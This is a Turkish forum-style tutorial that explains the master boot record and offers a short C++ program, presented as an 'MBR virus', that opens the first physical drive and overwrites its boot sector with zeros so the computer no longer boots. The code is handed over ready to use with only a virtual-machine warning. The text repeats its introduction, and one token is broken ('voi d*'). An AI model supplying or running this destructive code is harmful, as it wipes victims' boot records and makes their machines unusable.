Başlamadan önce önemli bir not: Asla kendi bilgisayarınızda denemeyin!
Merhaba, size kısa bir MBR virüsü nasıl yazılır, kısaca anlatacağım. Bu virüs kurnazların ve deneyimlilerin elinde en tehlikeli virüs bile olabilir. Zaten konunun başlığı bile ürpertici.
Kısaca MBR nedir? MBR ana hard-disk'in ilk sektörü olan ve işletim sisteminin tutulduğu yerdir. Bilgisayar ilk açılışta bu sektörü kullanarak kendini boot'a hazır hale getirir. Şimdi ise bu özellikten faydalanarak pek de yaygın olmayan MBR'nin dosyalarını düzenleyip asla çalıştırılamaz hale getireceğiz. (Bu virüsün çözümü aslında basit ama dediğim gibi, yaygın değil bu sebeple kaynak bulmak bi hayli zor) Hazır kodu ben size direkt olarak sunayım, kısa bir kod olduğu için her satırın işlevini anlatmak saçma olur.
Virüs uygulandıktan ve bilgisayarı yeniden başlattıktan sonra karşınıza çıkacak ekran şu olmalıdır:
Peki bu virüs ile ne yapabilirsiniz?
Dediğim gibi, bu virüs hakkında pek fazla kaynak yok, bunu değerlendirin
Sadece virüs mü?
Tabii ki de hayır, İngilizce kaynaklardan araştırıp işinize çok yarayacak şeyler bulabilirsiniz. Bu kod Fiziksel sürücüdeki boot dosyasını silmek için yazıldı, siz bunu sistemin nasıl işlediğini anlamak için de kullanabilirsiniz! Kim bilir? Belkide ileride hiç beklemediğiniz bilgiler, mekanikler karşınıza çıkar ve bilginize bilgi katarsınız.
Merhaba, size kısa bir MBR virüsü nasıl yazılır, kısaca anlatacağım. Bu virüs kurnazların ve deneyimlilerin elinde en tehlikeli virüs bile olabilir. Zaten konunun başlığı bile ürpertici.
Kısaca MBR nedir? MBR ana hard-disk'in ilk sektörü olan ve işletim sisteminin tutulduğu yerdir. Bilgisayar ilk açılışta bu sektörü kullanarak kendini boot'a hazır hale getirir. Şimdi ise bu özellikten faydalanarak pek de yaygın olmayan MBR'nin dosyalarını düzenleyip asla çalıştırılamaz hale getireceğiz. (Bu virüsün çözümü aslında basit ama dediğim gibi, yaygın değil bu sebeple kaynak bulmak bi hayli zor) Hazır kodu ben size direkt olarak sunayım, kısa bir kod olduğu için her satırın işlevini anlatmak saçma olur.
Kod:
#include <iostream>
#include <memory>
#include <Windows.h>
#define MBR_SIZE 512
int main()
{
std::cout << "Son uyari! Bunu bir sanal makinede test edin!!! Cihazı yok etmek icin herhangi bir tusa basin.\n";
system("PAUSE");
DWORD count;
char mbrPAYLOAD[MBR_SIZE];
ZeroMemory(mbrPAYLOAD, MBR_SIZE);
voi d* mbrKonum = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL);
if (WriteFile(mbrKonum, mbrPAYLOAD, MBR_SIZE, &count, NULL))
std::cout << "MBR basariyla yazildi! Etkisini gormek icin cihazi yeniden baslatin!\n";
else
std::cout << "BASARISIZLIK! Uygulamayi yonetici olarak calistirin!\n";
CloseHandle(mbrKonum);
system("PAUSE");
return EXIT_SUCCESS;
}Virüs uygulandıktan ve bilgisayarı yeniden başlattıktan sonra karşınıza çıkacak ekran şu olmalıdır:
Peki bu virüs ile ne yapabilirsiniz?
Dediğim gibi, bu virüs hakkında pek fazla kaynak yok, bunu değerlendirin
Sadece virüs mü?
Tabii ki de hayır, İngilizce kaynaklardan araştırıp işinize çok yarayacak şeyler bulabilirsiniz. Bu kod Fiziksel sürücüdeki boot dosyasını silmek için yazıldı, siz bunu sistemin nasıl işlediğini anlamak için de kullanabilirsiniz! Kim bilir? Belkide ileride hiç beklemediğiniz bilgiler, mekanikler karşınıza çıkar ve bilginize bilgi katarsınız.
Son düzenleme:
